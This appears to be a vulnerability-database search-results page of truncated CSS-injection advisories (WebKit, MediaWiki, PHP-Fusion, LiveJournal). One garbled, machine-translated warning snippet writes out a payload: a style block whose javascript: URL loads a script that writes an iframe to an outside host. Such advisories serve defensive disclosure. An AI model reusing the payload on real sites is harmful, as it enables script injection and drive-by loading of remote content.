432 matches found
CVE-2011-0161
CVE-2011-0161 affects WebKit as used in Apple Safari before 5.0.4 and iOS before 4.3. The vulnerability arises from how the Attr.style accessor is handled, allowing remote attackers to bypass the Same Origin Policy and inject CSS token sequences via a crafted website. The described impact is that...
FreeBSD : mediawiki -- multiple vulnerabilities (8d04cfbd-344d-11e0-8669-0025222482c5)
MediaWiki reports: An arbitrary script inclusion vulnerability was discovered. The vulnerability only allows execution of files with names ending in '.php' which are already present in the local filesystem. Only servers running Microsoft Windows and possibly Novell Netware are affected. Despite...
DEBIAN-CVE-2011-0047
Cross-site scripting (XSS) vulnerability in MediaWiki before 1.16.2 allows remote attackers to inject arbitrary web script or HTML via crafted Cascading Style Sheets (CSS) comments, aka "CSS injection vulnerability."...
CVE-2011-0047
Cross-site scripting (XSS) vulnerability in MediaWiki before 1.16.2 allows remote attackers to inject arbitrary web script or HTML via crafted Cascading Style Sheets (CSS) comments, aka "CSS injection vulnerability."...
CVE-2011-0047
CVE-2011-0047 is a cross-site scripting (XSS) vulnerability in MediaWiki prior to 1.16.2, exploitable by remote attackers via crafted CSS comments to inject script/HTML. Affected component: MediaWiki core; root cause: improper handling of CSS comment content leading to HTML/JS injection; impact: ...
mediawiki -- multiple vulnerabilities
MediaWiki reports: An arbitrary script inclusion vulnerability was discovered. The vulnerability only allows execution of files with names ending in ".php" which are already present in the local filesystem. Only servers running Microsoft Windows and possibly Novell Netware are affected. Despite...
CVE-2010-1647
Cross-site scripting (XSS) vulnerability in MediaWiki 1.15 before 1.15.4 and 1.16 before 1.16 beta 3 allows remote attackers to inject arbitrary web script or HTML via crafted Cascading Style Sheets (CSS) strings that are processed as script by Internet Explorer...
[Onapsis Security Advisory 2010-003] SAP WebDynpro Runtime XSS/CSS Injection
Onapsis Security Advisory 2010-00: SAP WebDynpro Runtime XSS/CSS Injection. This advisory can be downloaded from http://www.onapsis.com/research.html. By downloading this advisory from the Onapsis Resource Center, you will gain access to beforehand...
Use CSS hung it using the method!- Vulnerability warning-the black bar safety net
Inserted into the css or the head of the style can be... If the plug portion of the style in this writing style type="text/css" !-- body background-image: url'javascript:document. write"script src=aa. js/script"' -- /style Call the aa. js content document. write"iframe src=http://www. winshell. c...
CVE-2005-2401
PHP-Fusion allows remote attackers to inject arbitrary Cascading Style Sheets (CSS) via the BBCode color tag...
CVE-2005-2401
PHP-Fusion is affected by CVE-2005-2401: remote attackers can inject arbitrary CSS through the BBCode color tag in posts. The related Nessus plugin and CVE records indicate this affects PHP-Fusion builds around the 6.0x line (e.g.,
LiveJournal 1.1 - CSS HTML Injection
LiveJournal 1.1 - CSS HTML Injection source: https://www.securityfocus.com/bid/9727/info LiveJournal is reportedly prone to HTML injection via Cascading Style Sheet (CSS) tags. It is possible to inject hostile HTML and script code into journal entries through this vulnerability. This could...